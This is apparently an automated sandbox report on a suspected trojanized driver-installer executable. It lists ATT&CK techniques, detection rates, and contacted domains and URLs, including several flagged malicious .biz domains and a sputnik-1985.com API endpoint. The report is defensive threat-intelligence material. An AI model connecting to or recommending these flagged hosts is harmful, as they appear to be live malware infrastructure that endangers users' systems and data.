              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Replication Through Removable Media              		12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		1
              Query Registry              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Deobfuscate/Decode Files or Information              		LSASS Memory221
              Security Software Discovery              		Remote Desktop Protocol41
              Data from Local System              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)1
              Obfuscated Files or Information              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading              		NTDS1
              Process Discovery              		Distributed Component Object ModelInput Capture115
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
              Peripheral Device Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
              File and Directory Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync22
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              SDIO_R773.exe6%VirustotalBrowse
              SDIO_R773.exe5%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              nuttyshopr.biz100%Avira URL Cloudmalware
              http://www.snappy-driver-installer.org/downloads/SDIO_Update.torrenthttp://www.snappy-driver-install0%Avira URL Cloudsafe
              spookycappy.biz100%Avira URL Cloudmalware
              https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com:443/cd/0/get/Ch9Eke8i0BLC3-DtINknVGtn0%Avira URL Cloudsafe
              https://sputnik-1985.com/apiQ100%Avira URL Cloudmalware
              https://sputnik-1985.com:443/api100%Avira URL Cloudmalware
              https://status.dropbox.com0%Avira URL Cloudsafe
              https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com/dE0%Avira URL Cloudsafe
              https://sputnik-1985.com/apiW100%Avira URL Cloudmalware
              fraggielek.biz100%Avira URL Cloudmalware
              https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com/0%Avira URL Cloudsafe
              littlenotii.biz100%Avira URL Cloudmalware
              https://sputnik-1985.com/apii100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              steamcommunity.com
              		104.102.49.254
              		truefalse
                		high
                edge-block-www-env.dropbox-dns.com
                		162.125.66.15
                		truefalse
                  		high
                  www-env.dropbox-dns.com
                  		162.125.66.18
                  		truefalse
                    		high
                    sputnik-1985.com
                    		104.21.64.1
                    		truefalse
                      		high
                      littlenotii.biz
                      		unknown
                      		unknowntrue
                        		unknown
                        fraggielek.biz
                        		unknown
                        		unknowntrue
                          		unknown
                          nuttyshopr.biz
                          		unknown
                          		unknowntrue
                            		unknown
                            grandiouseziu.biz
                            		unknown
                            		unknowntrue
                              		unknown
                              marketlumpe.biz
                              		unknown
                              		unknowntrue
                                		unknown
                                spookycappy.biz
                                		unknown
                                		unknowntrue
                                  		unknown
                                  truculengisau.biz
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.dropbox.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        punishzement.biz
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          spookycappy.biztrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://steamcommunity.com/profiles/76561199724331900false
                                            		high
                                            nuttyshopr.biztrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            fraggielek.biztrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            littlenotii.biztrue
                                            • Avira URL Cloud: malware
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://www.cloudflare.com/learning/access-management/phishing-attack/SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/chrome_newtabSDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://gcc.gnu.org/bugs/):SDIO_R773.exefalse
                                                  		high
                                                  https://duckduckgo.com/ac/?q=SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://paper.dropbox.com/cloud-docs/editSDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com/dESDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.dropbox.com/SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.valvesoftware.com/legal.htmSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.youtube.comSDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://officeapps-df.live.comSDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://s.ytimg.com;SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://api.login.yahoo.com/SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://steambroadcast-test.akamaizedSDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.certum.pl/CPS0SDIO_R773.exefalse
                                                                                  		high
                                                                                  https://login.yahoo.com/SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://status.dropbox.comSDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2069109357.000000000488B000.00000004.00000800.00020000.00000000.sdmp, NOUBJXTSUL2YOW34.exe.0.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.dropbox.com/playlist/SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://onedrive.live.com/pickerSDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.youtube.coSDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.snappy-driver-installer.org/downloads/SDIO_Update.torrenthttp://www.snappy-driver-installSDIO_R773.exefalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://dropbox.com/vSDIO_R773.exe, 00000000.00000002.2067904046.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.2060769006.0000000000D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://ocsp.rootca1.amazontrust.com0:SDIO_R773.exe, 00000000.00000003.1969345473.0000000004817000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0wSDIO_R773.exefalse
                                                                                                    		high
                                                                                                    https://www.ecosia.org/newtab/SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://lv.queniujq.cnSDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.youtube.com/SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://cfl.dropboxstatic.com/static/metaserver/static/css/error.cssSDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2069109357.000000000488B000.00000004.00000800.00020000.00000000.sdmp, NOUBJXTSUL2YOW34.exe.0.drfalse
                                                                                                              		high
                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://docs.sandbox.google.com/document/fsip/SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.cloudflare.com/5xx-error-landingSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.google.com/recaptcha/SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://checkout.steampowered.com/SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSDIO_R773.exe, 00000000.00000003.1830640311.0000000004808000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://dl-web.dropbox.com/SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://app.hellofax.com/SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://cfl.dropboxstatic.com/static/SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://crl.certum.pl/ctsca2021.crl0oSDIO_R773.exefalse
                                                                                                                                    		high
                                                                                                                                    https://www.hellofax.com/SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://help.steampowered.com/en/SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com:443/cd/0/get/Ch9Eke8i0BLC3-DtINknVGtnSDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://instructorledlearning.dropboxbusiness.com/SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://recaptcha.net/recaptcha/;SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&amp;l=enSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.dropbox.com/pithos/SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://sales.dropboxbusiness.com/SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://a.sprig.com/SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://broadcast.st.dl.eccdnx.comSDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.dropbox.com/encrypted_folder_download/service_worker.jsSDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://subca.ocsp-certum.com05SDIO_R773.exefalse
                                                                                                                                                              		high
                                                                                                                                                              http://x1.c.lencr.org/0SDIO_R773.exe, 00000000.00000003.1969345473.0000000004817000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://x1.i.lencr.org/0SDIO_R773.exe, 00000000.00000003.1969345473.0000000004817000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://subca.ocsp-certum.com02SDIO_R773.exefalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://subca.ocsp-certum.com01SDIO_R773.exefalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://repository.certum.pl/ctnca2.cer09SDIO_R773.exefalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://www.dropbox.com/static/api/SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://sputnik-1985.com:443/apiSDIO_R773.exe, 00000000.00000003.1958629667.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1958490684.00000000047D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://www.dropbox.com/csp_log?policy_name=metaserver-dynamicSDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://steamcommunity.com/workshop/SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://login.steampowered.com/SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://support.mozilla.org/products/firefoxgro.allSDIO_R773.exe, 00000000.00000003.1970370060.00000000048F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://store.steampowered.com/legal/SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://docsend.com/SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://sputnik-1985.com/apiQSDIO_R773.exe, 00000000.00000003.2005003653.0000000000D7F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067744653.0000000000D85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoSDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&aSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=englSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://sputnik-1985.com/apiWSDIO_R773.exe, 00000000.00000003.1958490684.00000000047DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com/SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://store.steampowered.com/SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://www.certum.pl/CPS0SDIO_R773.exefalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://sputnik-1985.com/apiiSDIO_R773.exe, 00000000.00000003.2005093546.00000000047DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngSDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://127.0.0.1:27060SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgSDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
